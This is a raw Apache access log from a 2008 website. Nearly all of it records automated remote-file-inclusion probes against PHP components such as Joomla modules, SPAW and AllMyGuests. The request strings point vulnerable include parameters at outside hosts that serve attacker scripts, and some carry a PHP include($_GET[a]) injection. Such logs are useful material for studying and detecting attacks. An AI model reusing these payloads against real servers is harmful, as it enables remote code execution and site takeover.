87.245.149.155 - - [16/May/2008:11:07:59 -0700] "GET //config/dbutil.bck.php?confdir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.21.35 - - [16/May/2008:11:08:10 -0700] "GET /logs/access_071122.log HTTP/1.0" 200 35217 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:11:08:11 -0700] "GET /logs/access_080313.log//index.php?sourcedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:11:08:37 -0700] "GET /logs/access_080212.log//index.php?sourcedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:11:08:44 -0700] "GET /logs/access_080120.log/akocomments.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:11:08:44 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:11:08:45 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:11:08:45 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.144.44.36 - - [16/May/2008:11:08:54 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/neang22.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.144.44.36 - - [16/May/2008:11:08:54 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/neang22.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:11:08:56 -0700] "GET /logs/access_071223.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:11:09:21 -0700] "GET /logs/access_080328.log//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:11:09:27 -0700] "GET /logs//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 47704 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:11:09:27 -0700] "GET //?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:11:09:51 -0700] "GET /logs/access_080308.log/mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:11:09:51 -0700] "GET /mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:11:09:52 -0700] "GET /logs/mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:11:09:53 -0700] "GET /logs//auction/includes/messages.inc.php?include_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:11:09:53 -0700] "GET //auction/includes/messages.inc.php?include_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.116.103.45 - - [16/May/2008:11:11:33 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:11:11:44 -0700] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:11:11:44 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:11:11:54 -0700] "GET /logs/access_071220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.90.72.88 - - [16/May/2008:11:11:55 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [16/May/2008:11:11:55 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [16/May/2008:11:12:20 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.woohp.org/cache/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
59.106.19.213 - - [16/May/2008:11:12:20 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.woohp.org/cache/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:11:12:23 -0700] "GET /logs/access_080219.log/mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.226.79.133 - - [16/May/2008:11:12:51 -0700] "GET /logs/mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [16/May/2008:11:12:52 -0700] "GET /mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.67.218 - - [16/May/2008:11:13:01 -0700] "GET /logs/access.log HTTP/1.1" 200 305493 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
85.114.130.19 - - [16/May/2008:11:13:19 -0700] "GET //main.php?sayfa=http://www.woohp.org/cache/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
72.36.154.122 - - [16/May/2008:11:13:20 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.woohp.org/cache/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
72.36.154.122 - - [16/May/2008:11:13:20 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.woohp.org/cache/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
85.114.130.19 - - [16/May/2008:11:13:20 -0700] "GET /logs//main.php?sayfa=http://www.woohp.org/cache/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
207.7.108.240 - - [16/May/2008:11:13:30 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [16/May/2008:11:13:30 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [16/May/2008:11:14:26 -0700] "GET /logs//popup_window.php?site_isp_root=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [16/May/2008:11:14:26 -0700] "GET //popup_window.php?site_isp_root=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:11:14:28 -0700] "GET /logs/access_080131.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:11:14:28 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:11:14:28 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.226.176 - - [16/May/2008:11:15:07 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://www.vennom.t35.com/cmdbuscador.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [16/May/2008:11:15:07 -0700] "GET /modifyform.html?code=http://www.vennom.t35.com/cmdbuscador.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [16/May/2008:11:15:07 -0700] "GET /logs/modifyform.html?code=http://www.vennom.t35.com/cmdbuscador.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:11:15:41 -0700] "GET /logs/access_080218.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.226.176 - - [16/May/2008:11:15:46 -0700] "GET /logs/access_071225.log/modifyform.html?code=http://www.vennom.t35.com/cmdbuscador.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:11:16:01 -0700] "GET /logs/access_080303.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.226.176 - - [16/May/2008:11:16:18 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.vennom.t35.com/cmdbuscador.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [16/May/2008:11:16:23 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.vennom.t35.com/cmdbuscador.txt????? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [16/May/2008:11:16:23 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.vennom.t35.com/cmdbuscador.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.17.238 - - [16/May/2008:11:17:06 -0700] "GET /logs/access_071109.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:11:17:09 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:11:17:10 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:11:17:56 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:11:18:01 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:11:18:01 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.93 - - [16/May/2008:11:18:08 -0700] "GET /logs/access_071126.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:18:25 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:18:26 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:18:27 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.116.103.45 - - [16/May/2008:11:18:52 -0700] "GET /include/bbs.lib.inc.php?site_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
201.116.103.45 - - [16/May/2008:11:18:52 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:18:54 -0700] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:18:54 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:18:55 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:18:55 -0700] "GET /logs/access_080211.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:19:00 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:19:00 -0700] "GET /modifyform.html?code=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:19:00 -0700] "GET /logs/modifyform.html?code=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:11:19:02 -0700] "GET /logs//popup_window.php?site_isp_root=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:11:19:03 -0700] "GET //popup_window.php?site_isp_root=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [16/May/2008:11:19:17 -0700] "GET /logs/mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [16/May/2008:11:19:18 -0700] "GET /mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:19:27 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:19:28 -0700] "GET /modifyform.html?code=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:19:29 -0700] "GET /logs/access_071225.log/modifyform.html?code=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:19:29 -0700] "GET /logs/modifyform.html?code=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [16/May/2008:11:19:30 -0700] "GET /logs//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
70.84.182.98 - - [16/May/2008:11:19:30 -0700] "GET //index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:19:31 -0700] "GET /logs/access.log//language.inc.php?langs_dir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:19:31 -0700] "GET //language.inc.php?langs_dir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:19:32 -0700] "GET /logs//language.inc.php?langs_dir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:11:19:36 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:11:19:36 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:11:19:42 -0700] "GET /modifyform.html?code=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:11:19:42 -0700] "GET /logs/modifyform.html?code=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:19:43 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
213.203.223.93 - - [16/May/2008:11:19:51 -0700] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.226.79.133 - - [16/May/2008:11:19:51 -0700] "GET /logs/mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.223.93 - - [16/May/2008:11:19:51 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.226.79.133 - - [16/May/2008:11:19:51 -0700] "GET /mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.171.182 - - [16/May/2008:11:20:11 -0700] "GET /logs/access_071214.log/index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.190.22.52 - - [16/May/2008:11:20:17 -0700] "GET /logs/errors.php?error=http://th3m3.awardspace.com/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.190.22.52 - - [16/May/2008:11:20:17 -0700] "GET /errors.php?error=http://th3m3.awardspace.com/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.225.171.182 - - [16/May/2008:11:20:17 -0700] "GET /logs/index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [16/May/2008:11:20:18 -0700] "GET /index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
87.245.149.155 - - [16/May/2008:11:20:35 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [16/May/2008:11:20:35 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [16/May/2008:11:20:41 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.apnic.net/index.html? HTTP/1.0" 200 4123 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [16/May/2008:11:20:41 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.apnic.net/index.html? HTTP/1.0" 200 4123 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [16/May/2008:11:20:52 -0700] "GET /logs/send_reminders.php?includedir=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:11:20:52 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:11:20:52 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [16/May/2008:11:20:52 -0700] "GET /send_reminders.php?includedir=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:21:01 -0700] "GET /logs/access_071225.log/modifyform.html?code=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:21:12 -0700] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:11:21:17 -0700] "GET /logs/index.php?incl=http://83.222.131.90/~legitimi/mybase/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.19.51.194 - - [16/May/2008:11:21:20 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=%20http://naira-boy.xphost.org/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [16/May/2008:11:21:20 -0700] "GET /akocomments.php?mosConfig_absolute_path=%20http://naira-boy.xphost.org/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:21:20 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:21:21 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:21:21 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:11:21:23 -0700] "GET /index.php?incl=http://83.222.131.90/~legitimi/mybase/safe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:21:24 -0700] "GET /logs/access_080102.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
